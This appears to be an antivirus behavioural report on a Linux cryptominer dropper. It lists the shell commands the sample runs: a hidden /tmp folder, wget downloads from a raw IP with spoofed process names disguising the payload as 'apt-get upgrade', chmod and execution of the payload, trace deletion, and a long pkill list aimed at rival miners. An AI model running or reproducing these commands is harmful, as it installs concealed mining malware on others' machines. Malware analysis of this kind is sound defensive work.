Technical Information
Malicious functions:
Launches processes:
- /bin/bash -c mkdir /tmp/.806/
- mkdir /tmp/.806/
- /bin/bash -c rm -rf /tmp/111
- rm -rf /tmp/111
- /bin/bash -c unalias pkill
- /bin/bash -c unalias ps
- /bin/bash -c unalias kill
- /bin/bash -c unalias exec
- /bin/bash -c unalias chmod
- /bin/bash -c exec -a \"asdasd\" wget -q -O /tmp/.806/\"apt-get upgrade\" http://198.144.159.132/ico/error
- /usr/bin/wget asdasd -q -O /tmp/.806/apt-get upgrade http://198.144.159.132/ico/error
- /bin/bash -c exec -a \"asdas5555\" wget -q -O /tmp/.806/config.json http://198.144.159.132/ico/ico1.jpg
- /usr/bin/wget asdas5555 -q -O /tmp/.806/config.json http://198.144.159.132/ico/ico1.jpg
- /bin/bash -c echo \"exec -a \\"apt-get upgrade\\" /tmp/.806/\"apt-get upgrade\">/dev/null &\" >> /tmp/.806/apt-get upgrade1;chmod +x /tmp/.806/*;/tmp/.806/apt-get upgrade1
- chmod +x /tmp/.806/apt-get /tmp/.806/apt-get upgrade /tmp/.806/config.json
- /tmp/.806/apt-get upgrade1
- apt-get upgrade upgrade
- /bin/bash -c rm -rf /tmp/.806/
- rm -rf /tmp/.806/
- /bin/bash -c rm -rf /tmp/8061
- rm -rf /tmp/8061
- /bin/bash -c pkill irq
- pkill irq
- /bin/bash -c pkill irqbalanc1
- pkill irqbalanc1
- /bin/bash -c pkill -f apaceha
- pkill -f apaceha
- /bin/bash -c pkill -f cryptonight
- pkill -f cryptonight
- /bin/bash -c pkill -f 45.76.102.45
- pkill -f 45.76.102.45
- /bin/bash -c pkill -f stratum
- pkill -f stratum
- /bin/bash -c pkill -f mixnerdx
- pkill -f mixnerdx
- /bin/bash -c pkill -f performedl
- pkill -f performedl
- /bin/bash -c pkill -f JnKihGjn
- pkill -f JnKihGjn
- /bin/bash -c pkill -f irqba2anc1
- pkill -f irqba2anc1
- /bin/bash -c pkill -f irqba5xnc1
- pkill -f irqba5xnc1
- /bin/bash -c pkill -f irqbnc1
- pkill -f irqbnc1
- /bin/bash -c pkill -f ir29xc1
- pkill -f ir29xc1
- /bin/bash -c pkill -f conns
- pkill -f conns
- /bin/bash -c pkill -f irqbalance
- pkill -f irqbalance
- /bin/bash -c pkill -f crypto-pool
- pkill -f crypto-pool
- /bin/bash -c pkill -f minexmr
- pkill -f minexmr
- /bin/bash -c pkill -f XJnRj
- pkill -f XJnRj
- /bin/bash -c pkill -f NXLAi
- pkill -f NXLAi
- /bin/bash -c pkill -f BI5zj
- pkill -f BI5zj
- /bin/bash -c pkill -f askdljlqw
- pkill -f askdljlqw
- /bin/bash -c pkill -f minerd
- pkill -f minerd
- /bin/bash -c pkill -f minergate
- pkill -f minergate
- /bin/bash -c pkill -f Guard.sh
- pkill -f Guard.sh
- /bin/bash -c pkill -f ysaydh
- pkill -f ysaydh
- /bin/bash -c pkill -f bonns
- pkill -f bonns
- /bin/bash -c pkill -f donns
- pkill -f donns
- /bin/bash -c pkill -f kxjd
- pkill -f kxjd
- /bin/bash -c pkill -f 108.61.186.224
- pkill -f 108.61.186.224
- /bin/bash -c pkill -f Duck.sh
- pkill -f Duck.sh
- /bin/bash -c pkill -f bonn.sh
- pkill -f bonn.sh
- /bin/bash -c pkill -f conn.sh
- pkill -f conn.sh
- /bin/bash -c pkill -f kworker34
- pkill -f kworker34
- /bin/bash -c pkill -f kw.sh
- pkill -f kw.sh
- /bin/bash -c pkill -f pro.sh
- pkill -f pro.sh
- /bin/bash -c pkill -f polkitd
- pkill -f polkitd
- /bin/bash -c pkill -f acpid
- pkill -f acpid
- /bin/bash -c \"ps\" auxf|grep -v grep|grep \"irc\"|awk '{print $2}'| head -n1
Kills the following processes:
- ksoftirqd/0
- acpid
Performs operations with the file system:
Modifies file access rights:
- /tmp/.806/apt-get
- /tmp/.806/apt-get upgrade
- /tmp/.806/config.json
Creates folders:
- /tmp/.806
Creates or modifies files:
- /tmp/.806/apt-get upgrade
- /tmp/.806/config.json
- /tmp/.806/apt-get
Deletes files:
- /tmp/111
- /root/apt-get
- /root/apt-get upgrade
- /root/config.json
- /tmp/8061
Network activity:
HTTP GET requests:
- 19#.###.159.132/ico/error
- 19#.###.#59.132/ico/ico1.jpg
Other:
Collects CPU information
Collects RAM information